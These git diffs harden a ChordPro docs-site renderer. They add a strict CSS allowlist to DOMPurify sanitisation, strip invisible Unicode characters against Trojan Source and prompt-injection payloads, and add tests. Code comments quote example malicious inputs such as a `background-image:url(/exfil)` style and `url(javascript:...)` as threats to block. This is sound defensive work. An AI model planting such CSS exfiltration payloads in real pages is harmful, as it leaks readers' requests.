+  // variation selectors (U+FE00–U+FE0F, U+E0100–U+E01EF) and
+  // language-tag characters (U+E0000–U+E007F). The latter two
+  // ranges render invisibly and have been used in steganography
+  // and prompt-injection vectors against text-processing
+  // pipelines — neutralise them on every path that does not need
+  // them. No legitimate ChordPro / docs-source content uses these
+  // codepoints.
   return (
     code === 0x00ad ||
     code === 0x200b ||
@@ -222,7 +231,10 @@ function isInvisibleFormatChar(code) {
     code === 0x2060 ||
     code === 0xfeff ||
     (code >= 0x202a && code <= 0x202e) ||
-    (code >= 0x2066 && code <= 0x2069)
+    (code >= 0x2066 && code <= 0x2069) ||
+    (code >= 0xfe00 && code <= 0xfe0f) ||
+    (code >= 0xe0000 && code <= 0xe007f) ||
+    (code >= 0xe0100 && code <= 0xe01ef)
   );
 }
 function isAsciiWhitespace(c) {
@@ -399,25 +411,56 @@ export function rewriteHref(href, sourceDir) {
 // `style` is added to PURIFY_CONFIG.ADD_ATTR so Shiki's per-token
 // `<span style="color:#XXXXXX">` survives sanitisation. DOMPurify
 // 3.x treats `style` as a URI-safe attribute (see
-// DEFAULT_URI_SAFE_ATTRIBUTES in DOMPurify/src/attrs.ts), which means
-// the IS_ALLOWED_URI regex is NOT applied to the CSS value — so a
-// `style="background-image:url(/exfil)"` written into an authored
-// markdown source would otherwise survive into the deployed HTML
-// and fire a GitHub-Pages-origin request from every reader's
-// browser. We defend in two layers below: (1) restrict the
-// attribute to the three tags Shiki emits, (2) strip any surviving
-// `style` whose value contains `url(`, which Shiki never emits.
+// DEFAULT_URI_SAFE_ATTRIBUTES in DOMPurify/src/attrs.ts), which
+// means the IS_ALLOWED_URI regex is NOT applied to the CSS value —
+// so a `style="background-image:url(/exfil)"` written into an
+// authored markdown source would otherwise survive into the
+// deployed HTML and fire a GitHub-Pages-origin request from every
+// reader's browser.
+//
+// Defence strategy: fail-closed allowlist of CSS
+// property:value patterns Shiki actually emits. Anything else
+// (`url(...)`, `image-set(...)`, `image(...)`, CSS hex escapes
+// like `url\28...\29` that browsers normalise to `url(...)`,
+// `@import` smuggled via inline-style — which browsers ignore
+// but the allowlist catches anyway, CSS comments inside the value,
+// custom `var(--x)` references with payloads) does not match and
+// triggers full-attribute strip. The allowlist matches the full
+// known repertoire of Shiki themes (color, font-style,
+// font-weight, text-decoration). A future Shiki release adding a
+// new declaration will trip the unit tests (which assert legitimate
+// output survives) and force a deliberate widening here, not
+// silent regression of the security posture.
 //
 // USE_PROFILES.html intentionally excludes the svg and mathml
 // profiles (see DOMPurify/src/tags.ts) so the `<span>` allowance
 // does NOT propagate into an SVG/MathML subtree — a future change
 // that adds `svg: true` here MUST re-audit the style allowlist.
 const SHIKI_STYLE_TAGS = new Set(['PRE', 'CODE', 'SPAN']);
-const CSS_URL_RE = /url\s*\(/i;
+// Match a single CSS declaration in the form `property: value`,
+// trimmed. Each branch is one property Shiki may emit; the value
+// patterns are deliberately strict (no parens, no backslashes, no
+// quotes, no whitespace except inside enumerated keywords).
+const SHIKI_STYLE_DECL_RE =
+  /^(?:color\s*:\s*#[0-9a-f]{3,8}|background-color\s*:\s*#[0-9a-f]{3,8}|font-style\s*:\s*(?:italic|normal|oblique)|font-weight\s*:\s*(?:bold|normal|lighter|bolder|[1-9]00)|text-decoration\s*:\s*(?:underline|none|line-through|overline))$/i;
 const PURIFY_CONFIG = {
   USE_PROFILES: { html: true },
   ADD_ATTR: ['id', 'style'],
 };
+
+/** Fail-closed: returns true ONLY when every `;`-separated
+ *  declaration in the supplied style value matches the Shiki
+ *  property:value allowlist. Empty / whitespace-only values are
+ *  treated as legitimate (DOMPurify would have left them as-is). */
+function isLegitimateShikiStyle(value) {
+  if (value.trim() === '') return true;
+  for (const raw of value.split(';')) {
+    const decl = raw.trim();
+    if (decl === '') continue;
+    if (!SHIKI_STYLE_DECL_RE.test(decl)) return false;
+  }
+  return true;
+}
 
 // Module-scoped: JSDOM + DOMPurify construction is non-trivial and
 // both instances are safe to reuse across sanitize() calls (the hook
@@ -448,18 +491,16 @@ DOMPurify.addHook('afterSanitizeAttributes', (node) => {
   // (`PRE` / `CODE` / `SPAN`). Custom elements and unknown tags are
   // intentionally outside SHIKI_STYLE_TAGS — their `style` is
   // stripped even if DOMPurify happens to pass the tag through.
+  // Even on the three allowed tags, the value is gated through the
+  // strict Shiki property:value allowlist; anything else (CSS
+  // `url(...)` / `image-set(...)` / hex-escaped parens /
+  // unrecognised properties) loses the entire attribute.
   const styleAttr = node.getAttribute('style');
   if (styleAttr !== null) {
-    if (!SHIKI_STYLE_TAGS.has(node.tagName)) {
-      node.removeAttribute('style');
-    } else if (CSS_URL_RE.test(styleAttr)) {
-      // Shiki only emits `color:#XXXXXX` / `font-style:italic` etc.
-      // — never `url(...)`. Any surviving `url(...)` reached this
-      // hook from an authored markdown source bypassing DOMPurify's
-      // URI check (which is skipped for URI-safe attributes); strip
-      // the whole attribute. Covers `background-image:url(/exfil)`,
-      // `url(javascript:...)`, `-moz-binding:url(...)`, and
-      // `behaviour:url(...)`.
+    if (
+      !SHIKI_STYLE_TAGS.has(node.tagName) ||
+      !isLegitimateShikiStyle(styleAttr)
+    ) {
       node.removeAttribute('style');
     }
   }
@@ -543,10 +584,10 @@ const SHIKI_LANG_ALIASES = new Map([
 const SHIKI_LOADED_LANGS = new Set(HIGHLIGHTER.getLoadedLanguages());
 
 // HAST `<pre>` properties to keep on Shiki output. Everything else
-// (Shiki's inline `style="background-color:..."`, `tabindex`, and
-// any future presentational attributes) is stripped so the
+// — Shiki's inline `style="background-color:..."`, `tabindex`, any
+// future string- or symbol-keyed property — is stripped so the
 // `.docs-prose pre` CSS rule keeps controlling background, padding,
-// and border-radius. Allowlist semantics — future Shiki versions
+// and border-radius. Allowlist semantics: future Shiki versions
 // adding new wrapper attrs cannot leak into the deployed HTML.
 const SHIKI_PRE_KEEP_PROPERTIES = new Set(['class']);
 const stripPreWrapper = {
@@ -567,6 +608,13 @@ const stripPreWrapper = {
       if (!SHIKI_PRE_KEEP_PROPERTIES.has(key)) {
         delete node.properties[key];
       }
+    }
+    // Object.keys() ignores symbol-keyed properties. Defensive: a
+    // future HAST node that smuggles a Symbol-keyed sentinel
+    // (private internal state, framework instrumentation, …) would
+    // otherwise bypass the allowlist intent — drop those too.
+    for (const sym of Object.getOwnPropertySymbols(node.properties)) {
+      delete node.properties[sym];
     }
   },
 };
@@ -629,6 +677,10 @@ const MAX_CODE_BLOCK_BYTES = 256 * 1024;
  * @throws {Error} when `code` exceeds `MAX_CODE_BLOCK_BYTES`.
  */
 export function highlightCodeBlock(code, lang) {
+  // Semantics: input MUST be `<= MAX_CODE_BLOCK_BYTES`. Inputs of
+  // exactly the cap size are accepted; the first rejected size is
+  // `MAX_CODE_BLOCK_BYTES + 1`. The boundary is pinned by a unit
+  // test on both sides so a mutation flipping `>` ↔ `>=` is caught.
   if (Buffer.byteLength(code, 'utf8') > MAX_CODE_BLOCK_BYTES) {
     throw new Error(
       `highlightCodeBlock input exceeds ${MAX_CODE_BLOCK_BYTES} bytes; ` +

--- a/packages/playground/scripts/lib/docs-render.mjs
+++ b/packages/playground/scripts/lib/docs-render.mjs
@@ -212,14 +212,15 @@ const DANGEROUS_URI_SCHEMES = [
 ];
 
 function isInvisibleFormatChar(code) {
-  // Covers (a) the canonical BIDI / format-control set that CSPP /
-  // CVE-2021-42574 (Trojan Source) recognises plus (b) Unicode
+  // Covers (a) the canonical BIDI / format-control set that
+  // CVE-2021-42574 (Trojan Source) recognises, (b) Unicode
   // variation selectors (U+FE00–U+FE0F, U+E0100–U+E01EF) and
-  // language-tag characters (U+E0000–U+E007F). The latter two
-  // ranges render invisibly and have been used in steganography
-  // and prompt-injection vectors against text-processing
-  // pipelines — neutralise them on every path that does not need
-  // them. No legitimate ChordPro / docs-source content uses these
+  // Mongolian variation selectors (U+180B–U+180D), and (c)
+  // language-tag characters (U+E0000–U+E007F). All of these
+  // render invisibly and have been used in steganography and
+  // prompt-injection vectors against text-processing pipelines.
+  // Neutralise them on every path that does not need them — no
+  // legitimate ChordPro / docs-source content uses these
   // codepoints.
   return (
     code === 0x00ad ||
@@ -230,6 +231,7 @@ function isInvisibleFormatChar(code) {
     code === 0x200f ||
     code === 0x2060 ||
     code === 0xfeff ||
+    (code >= 0x180b && code <= 0x180d) ||
     (code >= 0x202a && code <= 0x202e) ||
     (code >= 0x2066 && code <= 0x2069) ||
     (code >= 0xfe00 && code <= 0xfe0f) ||
@@ -440,9 +442,26 @@ const SHIKI_STYLE_TAGS = new Set(['PRE', 'CODE', 'SPAN']);
 // Match a single CSS declaration in the form `property: value`,
 // trimmed. Each branch is one property Shiki may emit; the value
 // patterns are deliberately strict (no parens, no backslashes, no
-// quotes, no whitespace except inside enumerated keywords).
-const SHIKI_STYLE_DECL_RE =
-  /^(?:color\s*:\s*#[0-9a-f]{3,8}|background-color\s*:\s*#[0-9a-f]{3,8}|font-style\s*:\s*(?:italic|normal|oblique)|font-weight\s*:\s*(?:bold|normal|lighter|bolder|[1-9]00)|text-decoration\s*:\s*(?:underline|none|line-through|overline))$/i;
+// quotes, no whitespace except inside enumerated keywords). The
+// hex-colour widths cover the four CSS-spec lengths (3, 4, 6, 8);
+// 5- and 7-digit hex values are CSS-malformed and never emitted by
+// any bundled Shiki theme. The `text-decoration` value allows a
+// space-separated combination so a token carrying both
+// `underline` and `line-through` bits (which Shiki's core renderer
+// joins with a space) survives the allowlist.
+const HEX_COLOUR_VALUE = /#(?:[0-9a-f]{8}|[0-9a-f]{6}|[0-9a-f]{3,4})/i;
+const TEXT_DECORATION_KW = /(?:underline|none|line-through|overline)/;
+const SHIKI_STYLE_DECL_RE = new RegExp(
+  `^(?:` +
+    `color\\s*:\\s*${HEX_COLOUR_VALUE.source}` +
+    `|background-color\\s*:\\s*${HEX_COLOUR_VALUE.source}` +
+    `|font-style\\s*:\\s*(?:italic|normal|oblique)` +
+    `|font-weight\\s*:\\s*(?:bold|normal|lighter|bolder|[1-9]00)` +
+    `|text-decoration\\s*:\\s*${TEXT_DECORATION_KW.source}` +
+    `(?:\\s+${TEXT_DECORATION_KW.source})*` +
+    `)$`,
+  'i',
+);
 const PURIFY_CONFIG = {
   USE_PROFILES: { html: true },
   ADD_ATTR: ['id', 'style'],
@@ -649,11 +668,13 @@ function escapeHtmlText(value) {
     .replace(/'/g, '&#39;');
 }
 
-// Build-time-only function; the docs corpus's longest fence is
-// ~1.5 KB. A generous ceiling here turns a runaway input (a
-// machine-generated doc file, a mis-rendered binary embedded in a
-// fence) into a build error instead of an OOM or pathological
-// highlight run. `chordsketch-chordpro` enforces analogous caps per
+// Build-time-only function; the docs corpus's longest fence
+// (measured at 743 bytes by walking every fence under `docs/sdk/`
+// — see ADR-0025 §"Decision" + §"Consequences") sits well under
+// this ceiling. The cap turns a runaway input (a machine-generated
+// doc file, a mis-rendered binary embedded in a fence) into a
+// build error instead of an OOM or pathological highlight run.
+// `chordsketch-chordpro` enforces analogous caps per
 // `.claude/rules/code-style.md` §"Resource Limits".
 const MAX_CODE_BLOCK_BYTES = 256 * 1024;
 
@@ -730,10 +751,29 @@ export function renderMarkdown(source, sourcePath = '') {
   return DOMPurify.sanitize(html, PURIFY_CONFIG);
 }
 
-const FENCE_RE = /^```[\s\S]*?^```/gm;
+// Strip CommonMark fenced code blocks before heading extraction.
+// Sister-site to `FENCE_OPEN_RE` in `build-docs-static.mjs`: any
+// fence shape that the build-time validator treats as a code block
+// MUST also be excised here, otherwise a `##  heading` line
+// embedded inside the fence body would silently appear in the
+// on-page outline with a broken anchor (the heading does not reach
+// the rendered HTML, so the link 404-scrolls).
+//
+// CommonMark requires the closing fence to use the same character
+// (backtick or tilde) as the opening fence. Two regexes — one per
+// character — cleanly express that without backreference acrobatics.
+// Both opening and closing fences allow 0–3 leading spaces and a
+// trailing run of spaces/tabs (but not newlines).
+const BACKTICK_FENCE_RE =
+  /^ {0,3}`{3,}[\s\S]*?^ {0,3}`{3,}[^\S\n]*$/gm;
+const TILDE_FENCE_RE =
+  /^ {0,3}~{3,}[\s\S]*?^ {0,3}~{3,}[^\S\n]*$/gm;
 const HEADING_RE = /^(#+)\s+(.+)$/gm;
 export function extractOutline(source) {
-  const stripped = source.replace(FENCE_RE, (block) =>
+  let stripped = source.replace(BACKTICK_FENCE_RE, (block) =>
+    block.replace(/[^\n]/g, ''),
+  );
+  stripped = stripped.replace(TILDE_FENCE_RE, (block) =>
     block.replace(/[^\n]/g, ''),
   );
   const outline = [];

--- a/packages/playground/scripts/lib/docs-render.mjs
+++ b/packages/playground/scripts/lib/docs-render.mjs
@@ -394,6 +394,31 @@ export function rewriteHref(href, sourceDir) {
   return `${REPO_BLOB_BASE}${resolved}${hashSuffix}`;
 }
 
+// DOMPurify config + style-narrowing hook
+//
+// `style` is added to PURIFY_CONFIG.ADD_ATTR so Shiki's per-token
+// `<span style="color:#XXXXXX">` survives sanitisation. DOMPurify
+// 3.x treats `style` as a URI-safe attribute (see
+// DEFAULT_URI_SAFE_ATTRIBUTES in DOMPurify/src/attrs.ts), which means
+// the IS_ALLOWED_URI regex is NOT applied to the CSS value — so a
+// `style="background-image:url(/exfil)"` written into an authored
+// markdown source would otherwise survive into the deployed HTML
+// and fire a GitHub-Pages-origin request from every reader's
+// browser. We defend in two layers below: (1) restrict the
+// attribute to the three tags Shiki emits, (2) strip any surviving
+// `style` whose value contains `url(`, which Shiki never emits.
+//
+// USE_PROFILES.html intentionally excludes the svg and mathml
+// profiles (see DOMPurify/src/tags.ts) so the `<span>` allowance
+// does NOT propagate into an SVG/MathML subtree — a future change
+// that adds `svg: true` here MUST re-audit the style allowlist.
+const SHIKI_STYLE_TAGS = new Set(['PRE', 'CODE', 'SPAN']);
+const CSS_URL_RE = /url\s*\(/i;
+const PURIFY_CONFIG = {
+  USE_PROFILES: { html: true },
+  ADD_ATTR: ['id', 'style'],
+};
+
 // Module-scoped: JSDOM + DOMPurify construction is non-trivial and
 // both instances are safe to reuse across sanitize() calls (the hook
 // reads only the node passed in).
@@ -419,44 +444,63 @@ DOMPurify.addHook('afterSanitizeAttributes', (node) => {
     node.setAttribute('target', '_blank');
     node.setAttribute('rel', 'noreferrer noopener');
   }
-  // `style` is enabled in PURIFY_CONFIG.ADD_ATTR only to let Shiki's
-  // per-token `<span style="color:...">` survive. DOMPurify's CSS
-  // sanitiser already strips URLs / expressions / behaviour, but
-  // restrict the attribute to the three tags Shiki emits so an
-  // unrelated `<div style="...">` in a future markdown file cannot
-  // ride the same allowlist.
+  // `tagName` is uppercase in JSDOM for standard HTML elements
+  // (`PRE` / `CODE` / `SPAN`). Custom elements and unknown tags are
+  // intentionally outside SHIKI_STYLE_TAGS — their `style` is
+  // stripped even if DOMPurify happens to pass the tag through.
   const styleAttr = node.getAttribute('style');
-  if (styleAttr !== null && !SHIKI_STYLE_TAGS.has(node.tagName)) {
-    node.removeAttribute('style');
+  if (styleAttr !== null) {
+    if (!SHIKI_STYLE_TAGS.has(node.tagName)) {
+      node.removeAttribute('style');
+    } else if (CSS_URL_RE.test(styleAttr)) {
+      // Shiki only emits `color:#XXXXXX` / `font-style:italic` etc.
+      // — never `url(...)`. Any surviving `url(...)` reached this
+      // hook from an authored markdown source bypassing DOMPurify's
+      // URI check (which is skipped for URI-safe attributes); strip
+      // the whole attribute. Covers `background-image:url(/exfil)`,
+      // `url(javascript:...)`, `-moz-binding:url(...)`, and
+      // `behaviour:url(...)`.
+      node.removeAttribute('style');
+    }
   }
 });
 
-const SHIKI_STYLE_TAGS = new Set(['PRE', 'CODE', 'SPAN']);
-
-const PURIFY_CONFIG = {
-  USE_PROFILES: { html: true },
-  ADD_ATTR: ['id', 'style'],
-};
-
-// Shiki highlighter. Build-time only (the deployed pages carry zero
-// JS beyond the inline hash-redirect shim per ADR-0021); the
-// highlighter object is reused across every page render so we pay
-// grammar / theme load cost once. The ChordPro grammar is sister-site
-// to `syntaxes/chordpro.tmLanguage.json` — the same TextMate grammar
-// VS Code, Zed, and the JetBrains plugin ship for editor
-// highlighting, so on-page docs colour matches what readers see in
-// their editor.
+// Shiki highlighter. Build-time only per
+// [ADR-0025](../../../../docs/adr/0025-build-time-syntax-highlighting-shiki.md);
+// the deployed pages carry zero JS beyond the inline hash-redirect
+// shim ([ADR-0021](../../../../docs/adr/0021-docs-site-co-located-with-playground.md)).
+// The highlighter object is reused across every page render so we
+// pay grammar / theme load cost once. The ChordPro grammar is
+// sister-site to `syntaxes/chordpro.tmLanguage.json` — the same
+// TextMate grammar VS Code (`packages/vscode-extension`, copied via
+// esbuild) and the JetBrains plugin
+// (`packages/jetbrains-plugin/textmate/chordpro/`) already ship for
+// editor highlighting, so on-page docs colour matches what those
+// editors render. (The Zed extension uses an independent
+// tree-sitter grammar at `packages/tree-sitter-chordpro` — out of
+// scope here per ADR-0025.)
 const HERE = dirname(fileURLToPath(import.meta.url));
 const REPO_ROOT = resolve(HERE, '../../../..');
-const CHORDPRO_GRAMMAR = JSON.parse(
-  readFileSync(
-    resolve(REPO_ROOT, 'syntaxes/chordpro.tmLanguage.json'),
-    'utf8',
-  ),
+const CHORDPRO_GRAMMAR_PATH = resolve(
+  REPO_ROOT,
+  'syntaxes/chordpro.tmLanguage.json',
 );
-// Match the corpus surveyed under `docs/sdk/` (` ``` ` fences) plus
-// the obvious near-aliases. New languages used in markdown MUST be
-// added here or the renderer falls back to plain `<pre><code>`.
+let CHORDPRO_GRAMMAR;
+try {
+  CHORDPRO_GRAMMAR = JSON.parse(readFileSync(CHORDPRO_GRAMMAR_PATH, 'utf8'));
+} catch (err) {
+  throw new Error(
+    `Failed to load ChordPro TextMate grammar from ${CHORDPRO_GRAMMAR_PATH}. ` +
+      `This grammar is the sister site of the VS Code / JetBrains chordpro ` +
+      `language packages; verify the file exists and is valid JSON.`,
+    { cause: err },
+  );
+}
+// Languages preloaded into the singleton Shiki highlighter. The
+// roster MUST cover every fence header used under `docs/sdk/` —
+// `build-docs-static.mjs` enforces this at build time via
+// `assertEveryFenceLangIsLoaded` so an undeclared lang fails the
+// build instead of silently rendering plain `<pre><code>`.
 const SHIKI_LANGS = [
   'bash',
   'json',
@@ -471,42 +515,85 @@ const SHIKI_LANGS = [
   { ...CHORDPRO_GRAMMAR, name: 'chordpro' },
 ];
 const SHIKI_THEME = 'github-dark';
-const HIGHLIGHTER = await createHighlighter({
-  themes: [SHIKI_THEME],
-  langs: SHIKI_LANGS,
-});
-// `ts` is an alias for `typescript` in docs fences; Shiki's
-// bundled-languages alias map covers it for the dynamic loader but
-// not for a preloaded highlighter, so resolve aliases up-front.
+let HIGHLIGHTER;
+try {
+  HIGHLIGHTER = await createHighlighter({
+    themes: [SHIKI_THEME],
+    langs: SHIKI_LANGS,
+  });
+} catch (err) {
+  const langNames = SHIKI_LANGS.map((l) =>
+    typeof l === 'string' ? l : (l.name ?? '<unnamed grammar>'),
+  ).join(', ');
+  throw new Error(
+    `Shiki highlighter failed to initialise (theme=${SHIKI_THEME}, ` +
+      `langs=[${langNames}]). One of the grammars or the theme may be ` +
+      `malformed; check the trace and confirm Shiki version compatibility.`,
+    { cause: err },
+  );
+}
+// Aliases for fence headers actually used in the docs corpus.
+// Every alias's resolved value MUST appear in SHIKI_LOADED_LANGS
+// below; the build-time validator catches drift on the next build.
 const SHIKI_LANG_ALIASES = new Map([
   ['ts', 'typescript'],
-  ['js', 'javascript'],
   ['sh', 'bash'],
   ['shellscript', 'bash'],
 ]);
 const SHIKI_LOADED_LANGS = new Set(HIGHLIGHTER.getLoadedLanguages());
 
-// Strip Shiki's wrapper-level inline `style` / `tabindex` so the
-// existing `.docs-prose pre` rule keeps controlling background,
-// padding, and border radius. Per-token `<span>` colours stay.
+// HAST `<pre>` properties to keep on Shiki output. Everything else
+// (Shiki's inline `style="background-color:..."`, `tabindex`, and
+// any future presentational attributes) is stripped so the
+// `.docs-prose pre` CSS rule keeps controlling background, padding,
+// and border-radius. Allowlist semantics — future Shiki versions
+// adding new wrapper attrs cannot leak into the deployed HTML.
+const SHIKI_PRE_KEEP_PROPERTIES = new Set(['class']);
 const stripPreWrapper = {
   pre(node) {
-    if (node.properties) {
-      delete node.properties.style;
-      delete node.properties.tabindex;
+    if (!node.properties) {
+      // Shiki's hast contract requires every `<pre>` node to carry a
+      // `properties` object (so the `class="shiki <theme>"` attribute
+      // can land). A missing object means the upstream API changed;
+      // failing loudly here is the only way to keep this transformer
+      // honest — a silent no-op would let inline `style` regress.
+      throw new Error(
+        'Shiki HAST <pre> node has no `properties` object; the ' +
+          'highlighter API may have changed and `stripPreWrapper` is ' +
+          'no longer effective.',
+      );
+    }
+    for (const key of Object.keys(node.properties)) {
+      if (!SHIKI_PRE_KEEP_PROPERTIES.has(key)) {
+        delete node.properties[key];
+      }
     }
   },
 };
 
-function resolveShikiLang(lang) {
+/** Returns the canonical Shiki language id for a fence-header
+ *  string, or `null` when the lang is unknown / empty. Exposed for
+ *  the build-time validator in `build-docs-static.mjs`. */
+export function resolveShikiLang(lang) {
   if (!lang) return null;
   const lower = lang.toLowerCase();
   const aliased = SHIKI_LANG_ALIASES.get(lower) ?? lower;
   return SHIKI_LOADED_LANGS.has(aliased) ? aliased : null;
 }
 
+/** HTML-escape for text-node content (NOT attribute values; see
+ *  `escapeAttribute` for that context). Also filters BIDI overrides
+ *  and other invisible-format chars + null bytes so the unknown-lang
+ *  fallback path cannot smuggle Trojan-Source style payloads into
+ *  the deployed HTML. */
 function escapeHtmlText(value) {
-  return value
+  let filtered = '';
+  for (const ch of value) {
+    const code = ch.codePointAt(0);
+    if (code === 0 || isInvisibleFormatChar(code)) continue;
+    filtered += ch;
+  }
+  return filtered
     .replace(/&/g, '&amp;')
     .replace(/</g, '&lt;')
     .replace(/>/g, '&gt;')
@@ -514,10 +601,41 @@ function escapeHtmlText(value) {
     .replace(/'/g, '&#39;');
 }
 
-/** Build-time syntax highlight for a Markdown code fence. Falls back
- *  to plain `<pre><code>` when the language is unknown so a
- *  mis-tagged fence still renders. */
+// Build-time-only function; the docs corpus's longest fence is
+// ~1.5 KB. A generous ceiling here turns a runaway input (a
+// machine-generated doc file, a mis-rendered binary embedded in a
+// fence) into a build error instead of an OOM or pathological
+// highlight run. `chordsketch-chordpro` enforces analogous caps per
+// `.claude/rules/code-style.md` §"Resource Limits".
+const MAX_CODE_BLOCK_BYTES = 256 * 1024;
+
+/**
+ * Build-time syntax highlight for a single Markdown code fence.
+ * Falls back to a sanitised `<pre><code>` for unknown languages
+ * (also see `assertEveryFenceLangIsLoaded` in `build-docs-static.mjs`
+ * which prevents that fallback from being silent on the deployed
+ * corpus).
+ *
+ * Inputs come from in-repo markdown files, but the function is
+ * exported and could be reused. The size cap is the only validation
+ * — `code` is forwarded to Shiki and may legitimately contain any
+ * Unicode; the fallback path additionally strips invisible-format
+ * characters to neutralise Trojan-Source payloads.
+ *
+ * @param {string} code The fence body.
+ * @param {string} lang The fence header (e.g. "tsx", "chordpro", "").
+ * @returns {string} HTML — either `<pre class="shiki ..."><code>…</code></pre>`
+ *                   or `<pre><code>…</code></pre>` for unknown langs.
+ * @throws {Error} when `code` exceeds `MAX_CODE_BLOCK_BYTES`.
+ */
 export function highlightCodeBlock(code, lang) {
+  if (Buffer.byteLength(code, 'utf8') > MAX_CODE_BLOCK_BYTES) {
+    throw new Error(
+      `highlightCodeBlock input exceeds ${MAX_CODE_BLOCK_BYTES} bytes; ` +
+        `inputs come from in-repo markdown fences which should never be ` +
+        `this large. Either split the fence or raise MAX_CODE_BLOCK_BYTES.`,
+    );
+  }
   const resolved = resolveShikiLang(lang);
   if (resolved === null) {
     return `<pre><code>${escapeHtmlText(code)}</code></pre>`;

--- a/packages/playground/tests-e2e/docs.spec.ts
+++ b/packages/playground/tests-e2e/docs.spec.ts
@@ -69,4 +69,32 @@ test.describe('docs site (static)', () => {
       page.getByRole('heading', { level: 2, name: /^Recipe 1\b/ }),
     ).toBeVisible();
   });
+
+  test('code fences on a recipe page render with Shiki syntax highlighting', async ({
+    page,
+  }) => {
+    // Asserts the build-time highlighter is wired into the deployed
+    // pipeline per ADR-0021's zero-JS posture: every recipe block
+    // must reach the DOM as a `<pre class="shiki">` with per-token
+    // colour spans. A regression that silently fell back to plain
+    // `<pre><code>` would clear the unit suite (the highlighter
+    // module still loads) but show up here.
+    await page.goto('./docs/embed-react/');
+
+    const shikiBlocks = page.locator('pre.shiki');
+    await expect(shikiBlocks.first()).toBeVisible();
+    // Embed-react ships 12 fenced code blocks at the time of
+    // writing; assert a meaningful floor rather than the exact
+    // count so a future recipe addition / removal does not
+    // mechanically break the smoke.
+    expect(await shikiBlocks.count()).toBeGreaterThanOrEqual(5);
+
+    // Per-token colour spans are the load-bearing visual signal:
+    // without them, the block is plain text wearing a "shiki" class.
+    const colouredSpan = shikiBlocks
+      .first()
+      .locator('span[style*="color:"]')
+      .first();
+    await expect(colouredSpan).toBeVisible();
+  });
 });

--- a/packages/playground/tests-e2e/docs.spec.ts
+++ b/packages/playground/tests-e2e/docs.spec.ts
@@ -79,15 +79,20 @@ test.describe('docs site (static)', () => {
     // colour spans. A regression that silently fell back to plain
     // `<pre><code>` would clear the unit suite (the highlighter
     // module still loads) but show up here.
+    const pageErrors: Error[] = [];
+    page.on('pageerror', (err) => {
+      pageErrors.push(err);
+    });
+
     await page.goto('./docs/embed-react/');
 
     const shikiBlocks = page.locator('pre.shiki');
     await expect(shikiBlocks.first()).toBeVisible();
-    // Embed-react ships 12 fenced code blocks at the time of
-    // writing; assert a meaningful floor rather than the exact
-    // count so a future recipe addition / removal does not
-    // mechanically break the smoke.
-    expect(await shikiBlocks.count()).toBeGreaterThanOrEqual(5);
+    // Embed-react ships ~12 fenced code blocks. The floor of 10
+    // catches "half the page silently degraded to plain <pre>"
+    // regressions while still surviving legitimate recipe
+    // additions / removals.
+    expect(await shikiBlocks.count()).toBeGreaterThanOrEqual(10);
 
     // Per-token colour spans are the load-bearing visual signal:
     // without them, the block is plain text wearing a "shiki" class.
@@ -96,5 +101,49 @@ test.describe('docs site (static)', () => {
       .locator('span[style*="color:"]')
       .first();
     await expect(colouredSpan).toBeVisible();
+
+    // `stripPreWrapper` strips Shiki's inline wrapper styling so
+    // the existing `.docs-prose pre` CSS controls the visual
+    // chrome. A regression that re-introduced the wrapper would
+    // override the design tokens with Shiki's default dark bg;
+    // the unit suite catches it at module level, this catches
+    // it end-to-end in the deployed HTML.
+    await expect(shikiBlocks.first()).not.toHaveAttribute('style', /.+/);
+
+    expect(pageErrors).toEqual([]);
+  });
+
+  test('the ChordPro grammar is exercised on the render task page', async ({
+    page,
+  }) => {
+    // embed-react has zero ` ```chordpro ` fences; a regression in
+    // the in-repo TextMate grammar load (path move, malformed JSON,
+    // Shiki API change) silently degrades the chordpro blocks on
+    // /docs/render/ and /docs/transpose-task/. Without a separate
+    // smoke against one of those pages, the grammar-load failure
+    // would clear the embed-react smoke and ship un-highlighted
+    // ChordPro to readers.
+    const pageErrors: Error[] = [];
+    page.on('pageerror', (err) => {
+      pageErrors.push(err);
+    });
+
+    await page.goto('./docs/render/');
+
+    const shikiBlocks = page.locator('pre.shiki');
+    await expect(shikiBlocks.first()).toBeVisible();
+
+    // The chordpro grammar tokenises `{title:` so the directive
+    // keyword `title` lands in its own coloured span. If the
+    // grammar failed to load, the chordpro fences would either
+    // fall back to plain `<pre><code>` (no `pre.shiki` for them)
+    // or render as one untagged span. Either way this assertion
+    // fails.
+    const titleSpan = shikiBlocks
+      .locator('span[style*="color:"]', { hasText: /^title$/ })
+      .first();
+    await expect(titleSpan).toBeVisible();
+
+    expect(pageErrors).toEqual([]);
   });
 });

--- a/packages/playground/tests/build-docs-static.test.ts
+++ b/packages/playground/tests/build-docs-static.test.ts
@@ -294,6 +294,14 @@ describe('parseFenceHeaders (FENCE_OPEN_RE coverage)', () => {
     expect(parseFenceHeaders('Use `Returns` in prose.\n')).toEqual([]);
   });
 
+  it('does NOT match a fence opened with exactly two backticks or tildes', () => {
+    // Pins the `{3,}` lower bound. A mutation weakening to `{2,}`
+    // would treat ` ``tsx ` as a fence opener and would register
+    // a spurious lang from any 2-tick run starting a prose line.
+    expect(parseFenceHeaders('``tsx\nfoo\n``\n')).toEqual([]);
+    expect(parseFenceHeaders('~~tsx\nfoo\n~~\n')).toEqual([]);
+  });
+
   it('returns multiple langs across multiple fences in order', () => {
     const source = '```tsx\na\n```\n\n```bash\nb\n```\n\n~~~rust\nc\n~~~\n';
     expect(parseFenceHeaders(source)).toEqual(['tsx', 'bash', 'rust']);

--- a/packages/playground/tests/build-docs-static.test.ts
+++ b/packages/playground/tests/build-docs-static.test.ts
@@ -11,6 +11,8 @@ import { tmpdir } from 'node:os';
 import { dirname, resolve } from 'node:path';
 
 import {
+  assertEveryFenceLangIsLoaded,
+  collectFenceLangs,
   findCssAssetUrl,
   hashRedirectShim,
   pageHtml,
@@ -171,5 +173,41 @@ describe('findCssAssetUrl', () => {
     }
     const url = findCssAssetUrl();
     expect(url).toMatch(/^\/chordsketch\/assets\/docs-[\w-]+\.css$/);
+  });
+});
+
+describe('assertEveryFenceLangIsLoaded', () => {
+  it('passes against the current docs/sdk corpus', () => {
+    // The build-time gate that turns "Shiki silently falls back to
+    // plain <pre><code> for an undeclared lang" into a build
+    // failure. On main, every fence MUST resolve through Shiki.
+    expect(() => assertEveryFenceLangIsLoaded()).not.toThrow();
+  });
+
+  it('reports every fence-header lang found across all registered pages', () => {
+    const usages = collectFenceLangs();
+    // The corpus survey at the time of this PR landed: bash,
+    // chordpro, kotlin, python, ruby, rust, swift, ts, tsx. The
+    // floor of 7 leaves room for legitimate additions / removals
+    // without rewriting the test.
+    expect(usages.size).toBeGreaterThanOrEqual(7);
